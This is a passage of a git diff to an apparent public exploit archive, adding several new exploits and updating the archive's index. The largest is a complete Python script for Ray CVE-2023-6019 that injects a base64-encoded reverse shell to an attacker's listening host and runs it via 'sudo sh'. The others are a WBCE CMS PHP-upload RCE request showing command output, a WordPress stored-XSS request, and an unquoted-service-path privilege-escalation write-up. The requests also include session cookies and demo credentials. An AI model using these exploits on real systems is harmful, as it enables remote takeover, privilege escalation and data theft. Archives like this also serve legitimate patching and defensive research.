demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php +Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459 +Content-Length: 522 +Origin: https://demos6.softaculous.com +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="formtoken" + +5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="userfile"; filename="upgrade.php" +Content-Type: application/x-php + + + +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="submit" + + +-----------------------------86020911415982314764024459-- + +### Response : + + + + +
+
+ + +
+uid=1000(soft) gid=1000(soft) groups=1000(soft) +uid=1000(soft) gid=1000(soft) groups=1000(soft) +
+ + +

Invalid WBCE CMS language file. Please check the text file.

+ +

Back \ No newline at end of file diff --git a/exploits/php/webapps/51987.txt b/exploits/php/webapps/51987.txt new file mode 100644 index 000000000..1b30dac93 --- /dev/null +++ b/exploits/php/webapps/51987.txt @@ -0,0 +1,36 @@ +# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) +# Date: 12 April 2024 +# Exploit Author: Erdemstar +# Vendor: https://wordpress.com/ +# Version: 1.1.1 + +# Proof Of Concept: +1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". + +# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w +# Vulnerable Property at Request: videoFields[post_type] +# Payload: +# Request: +POST /wp-admin/options.php HTTP/2 +Host: erdemstar.local +Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 +Content-Length: 395 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "macOS" +Upgrade-Insecure-Requests: 1 +Origin: https://erdemstar.local +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i + +option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes \ No newline at end of file diff --git a/exploits/python/webapps/51978.txt b/exploits/python/webapps/51978.txt new file mode 100644 index 000000000..f4bf4ac37 --- /dev/null +++ b/exploits/python/webapps/51978.txt @@ -0,0 +1,96 @@ +# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) +# Description: +# The Ray Project dashboard contains a CPU profiling page, and the format parameter is +# not validated before being inserted into a system command executed in a shell, allowing +# for arbitrary command execution. If the system is configured to allow passwordless sudo +# (a setup some Ray configurations require) this will result in a root shell being returned +# to the user. If not configured, a user level shell will be returned +# Version: <= 2.6.3 +# Date: 2024-4-10 +# Exploit Author: Fire_Wolf +# Tested on: Ubuntu 20.04.6 LTS +# Vendor Homepage: https://www.ray.io/ +# Software Link: https://github.com/ray-project/ray +# CVE: CVE-2023-6019 +# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe +# ========================================================================================== + +# !usr/bin/python3 +# coding=utf-8 +import base64 +import argparse +import requests +import urllib3 + +proxies = {"http": "127.0.0.1:8080"} +headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" +} + + +def check_url(target, port): + target_url = target + ":" + port + https = 0 + if 'http' not in target: + try: + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + test_url = 'http://' + target_url + response = requests.get(url=test_url, headers=headers, verify=False, timeout=3) + if response.status_code != 200: + is_https = 0 + return is_https + except Exception as e: + print("ERROR! The Exception is:" + format(e)) + if https == 1: + return "https://" + target_url + else: + return "http://" + target_url + + +def exp(target,ip,lhost, lport): + payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'' + print("[*]Payload is: " + payload) + b64_payload = base64.b64encode(payload.encode()) + print("[*]Base64 encoding payload is: " + b64_payload.decode()) + exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`' + # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess) + print(exp_url) + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + response = requests.get(url=exp_url, headers=headers, verify=False) + if response.status_code == 200: + print("[-]ERROR: Exploit Failed,please check the payload.") + else: + print("[+]Exploit is finished,please check your machine!") + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + description=''' + ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ + ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ + ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄ + ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃ + + + + ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄ + ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄ + ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ + ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ + ''', + formatter_class=argparse.RawDescriptionHelpFormatter, + ) + parser.add_argument('-t', '--target', type=str, required=True, help='tart ip') + parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port') + parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip') + parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port') + args = parser.parse_args() + # target = args.target + ip = args.target + # port = args.port + # lhost = args.lhost + # lport = args.lport + targeturl = check_url(args.target, args.port) + print(targeturl) + print("[*] Checking in url: " + targeturl) + exp(targeturl, ip, args.lhost, args.lport) \ No newline at end of file diff --git a/exploits/windows_x86-64/local/51977.txt b/exploits/windows_x86-64/local/51977.txt new file mode 100644 index 000000000..fe8c6854c --- /dev/null +++ b/exploits/windows_x86-64/local/51977.txt @@ -0,0 +1,36 @@ +# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path +# Google Dork: null +# Date: 4/10/2024 +# Exploit Author: Joseph Kwabena Fiagbor +# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ +# Software Link: +# Version: v.1.23.0.02 +# Tested on: windows 7-11 +# CVE : CVE-2024-31804 + +1. Description: + +The Terratec dmx_6fire usb installs as a service with an unquoted service +path running +with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +> C:\Users\Astra>sc qc "ttdmx6firesvc" +> {SC] QueryServiceConfig SUCCESS +> +> SERVICE_NAME: ttdmx6firesvc +> TYPE : 10 WIN32_OWN_PROCESS +> START_TYPE : 2 AUTO_START +> ERROR_CONTROL : 1 NORMAL +> BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service +> LOAD_ORDER_GROUP : PlugPlay +> TAG : 0 +> DISPLAY_NAME : DMX6Fire Control +> DEPENDENCIES : eventlog +> : PlugPlay +> SERVICE_START_NAME : LocalSystem +> +> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index efe915c56..87d88938e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb +51976,exploits/go/remote/51976.txt,"MinIO < 2024-01-31T20-20-33Z - Privilege Escalation",2024-04-12,"Jenson Zhao",remote,go,,2024-04-12,2024-04-12,0,CVE-2024-24747,,,,, 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, 51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,, 51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,, @@ -10510,6 +10511,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21117,exploits/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,local,multiple,,2001-10-05,2012-09-23,1,CVE-2001-1127;OSVDB-11900,,,,,https://www.securityfocus.com/bid/3404/info 21359,exploits/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,local,multiple,,2002-03-22,2016-10-27,1,CVE-2001-1127;OSVDB-11904,,,,,https://www.securityfocus.com/bid/4402/info 288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,, +51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh @@ -19479,6 +19481,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgumbo-0.99beta.zip, 48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,,2020-03-03,2020-03-03,0,,,,,, 48106,exploits/php/webapps/48106.txt,"GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection",2020-02-24,emaragkos,webapps,php,,2020-02-24,2020-02-26,0,,,,,http://www.exploit-db.comeclass-1.7.3.zip, +51975,exploits/php/webapps/51975.txt,"GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload",2024-04-12,"George Tsimpidas",webapps,php,,2024-04-12,2024-04-12,0,CVE-2024-31777,,,,, 23219,exploits/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-2625,,,,,https://www.securityfocus.com/bid/8768/info 23192,exploits/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",webapps,php,,2003-09-29,2012-12-06,1,,,,,,https://www.securityfocus.com/bid/8717/info 23220,exploits/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-3198,,,,,https://www.securityfocus.com/bid/8769/info @@ -19767,6 +19770,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php,,2006-02-15,2013-07-31,1,,,,,,https://www.securityfocus.com/bid/16680/info 29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2327;OSVDB-35525,,,,,https://www.securityfocus.com/bid/23664/info 22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php,,2003-07-13,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8174/info +51979,exploits/php/webapps/51979.txt,"HTMLy Version v2.9.6 - Stored XSS",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php,,2006-11-15,2016-09-16,1,CVE-2006-7134,,,,http://www.exploit-db.comupload.tar.gz, 46149,exploits/php/webapps/46149.html,"Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)",2019-01-14,AllenChen,webapps,php,,2019-01-14,2019-01-14,0,CVE-2019-6249,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comGV32-CMS_v5.7.4.zip, 32047,exploits/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,webapps,php,,2008-07-11,2014-03-04,1,,,,,,https://www.securityfocus.com/bid/30184/info @@ -23754,6 +23758,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36418,exploits/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,webapps,php,,2015-03-17,2015-03-17,0,CVE-2015-2269;OSVDB-119617,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php 34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith Jayathissa",webapps,php,,2014-07-27,2014-07-27,0,CVE-2014-3544;OSVDB-109337,,,,,https://moodle.org/mod/forum/discuss.php?d=264265 41828,exploits/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",webapps,php,,2017-04-06,2017-04-06,0,CVE-2017-2641,,,,, +51984,exploits/php/webapps/51984.py,"Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter",2024-04-12,"Julio Ángel Ferrari",webapps,php,,2024-04-12,2024-04-12,0,,,,,, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,,2021-03-26,2021-03-26,0,,,,,, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",2021-04-23,UVision,webapps,php,,2021-04-23,2021-04-23,0,,,,,, 50700,exploits/php/webapps/50700.txt,"Moodle 3.11.4 - SQL Injection",2022-02-02,lavclash75,webapps,php,,2022-02-02,2022-02-02,0,CVE-2022-0332,,,,, @@ -28097,6 +28102,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php,,2008-06-10,,1,OSVDB-46100;CVE-2008-2753;OSVDB-46099;OSVDB-46098,,,,,http://www.bugreport.ir/?/42 3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php,,2007-01-11,,1,OSVDB-32807;CVE-2007-0307,,,,, 31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php,,2008-04-04,2014-02-12,1,CVE-2008-1787;OSVDB-44403,,,,,https://www.securityfocus.com/bid/28608/info +51982,exploits/php/webapps/51982.txt,"PopojiCMS Version 2.0.1 - Remote Command Execution",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php,,2007-10-01,2016-10-12,1,OSVDB-37422;CVE-2007-5221,,,,http://www.exploit-db.compoppawid.2.7.tar.gz, 2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php,,2006-09-11,2016-09-09,1,,,,,http://www.exploit-db.compopper-1.41-r2.tar.gz, 25788,exploits/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",webapps,php,,2005-06-03,2013-05-28,1,CVE-2005-1870;OSVDB-17085,,,,,https://www.securityfocus.com/bid/13851/info @@ -28659,7 +28665,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info 31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info 32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info -51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,, 45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip, 10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,, 7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,, @@ -29453,7 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, -51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,, +51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2024-04-12,1,CVE-2023-34581,,,,, 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz, 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,, 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,, @@ -32181,10 +32186,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10632,exploits/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,webapps,php,,2009-12-23,,0,,,,,, 8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,webapps,php,,2009-03-22,,1,OSVDB-55535;CVE-2009-2311,,,,, 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,, +51985,exploits/php/webapps/51985.txt,"WBCE 1.6.0 - Unauthenticated SQL injection",2024-04-12,"young pope",webapps,php,,2024-04-12,2024-04-12,0,,,,,, 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,, 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,, 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, 51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, +51986,exploits/php/webapps/51986.txt,"WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,, 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,, 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,, @@ -33517,6 +33524,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",webapps,php,,2011-04-03,2014-12-17,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/47142/info 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80,2018-08-27,2018-08-28,1,CVE-2018-15877,"Command Injection",,http://www.exploit-db.com/screenshots/idlt45500/45274.png,http://www.exploit-db.complainview-activity-monitor.20161228.zip, 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) 